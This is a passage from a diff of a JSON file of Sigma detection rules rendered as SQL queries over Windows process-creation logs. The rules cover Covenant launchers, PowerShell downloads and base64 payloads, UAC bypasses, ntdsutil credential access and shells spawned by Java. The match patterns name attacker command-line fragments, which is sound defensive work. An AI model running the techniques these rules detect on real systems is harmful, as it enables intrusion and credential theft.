(CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrm_awl_bypass.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Execute From Alternate Data Streams", - "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "status": "test", - "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", - "author": "frack113", + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_alternate_data_streams.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Suspicious Csi.exe Usage", - "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "status": "experimental", - "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", - "author": "Konstantin Grishchenko, oscd.community", + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.execution", - "attack.t1072", - "attack.defense_evasion", - "attack.t1218" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate usage by software developers" + "Legitimate calls to system binaries", + "Company specific internal usage" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_execution.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "Potential RDP Session Hijacking Activity", - "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "title": "Arbitrary Binary Execution Using GUP Utility", + "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", "status": "experimental", - "description": "Detects potential RDP Session Hijacking activity on Windows systems", - "author": "@juju4", + "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution" ], "falsepositives": [ - "Administrative activity" + "Other parent binaries using GUP not currently identified" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\gup.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" ], - "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" + "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "title": "Suspicious CodePage Switch Via CHCP", + "id": "c7942406-33dd-4377-a564-0f62db0593a3", "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a code page switch in command line or batch scripts to a rare language", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1036", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Administrative activity (adjust code pages according to your organization's region)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_chcp_codepage_switch.yml" }, { - "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "a58353df-af43-4753-bad0-cd83ef35eef5", - "status": "experimental", - "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", + "status": "test", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage to restore snapshots", - "Legitimate admin activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ntdsutil_susp_usage.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "title": "SC.EXE Query Execution", + "id": "57712d7a-679c-4a41-a913-87e7175ae429", "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.002" + "attack.discovery", + "attack.t1007" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Legitimate query of a service by an administrator to get more information such as the state or PID", + "Keybase process \"kbfsdokan.exe\" query the dokan1 service with the following commandline \"sc query dokan1\"" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND OriginalFileName LIKE '%sc.exe' ESCAPE '\\' AND CommandLine LIKE '% query%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_sc_query.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Active Directory Database Snapshot Via ADExplorer", + "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "status": "experimental", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Execution of Powershell with Base64", + "id": "fb843269-508c-4b76-8b8d-88679db22ce7", + "status": "experimental", + "description": "Commandline to launch powershell with a base64 payload", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_powershell_encode.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", - "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Sysinternals PsSuspend Execution", + "id": "48bbc537-b652-4b4e-bd1d-281172df448f", + "status": "experimental", + "description": "Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'pssuspend.exe' OR (NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_execution.yml" }, { - "title": "Service Reconnaissance Via Wmic.EXE", - "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", + "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", "status": "experimental", - "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_service.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "System Network Connections Discovery Via Net.EXE", - "id": "1c67a717-32ba-409b-a45d-0fb704a73a81", - "status": "experimental", - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "author": "frack113", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "status": "test", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1049" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((CommandLine LIKE '% use' ESCAPE '\\' OR CommandLine LIKE '% sessions' ESCAPE '\\') OR (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% sessions %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_network_connections_discovery.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "title": "Change PowerShell Policies to an Insecure Level", + "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", "status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of executionpolicy option to set insecure policies", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Very unlikely" + "Administrator script" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" }, { - "title": "MSExchange Transport Agent Installation", - "id": "83809e84-4475-4b69-bc3e-4aad8568612f", + "title": "DLL Execution Via Register-cimprovider.exe", + "id": "a2910908-e86f-4687-aeba-76a5f996e652", "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", + "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.defense_evasion", + "attack.t1574" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" + "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Set Files as System Files Using Attrib.EXE", + "id": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"attrib\" with the \"+s\" flag to mark files as system files", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s %' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_attrib_system.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "title": "Obfuscated IP Download", + "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.discovery" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' 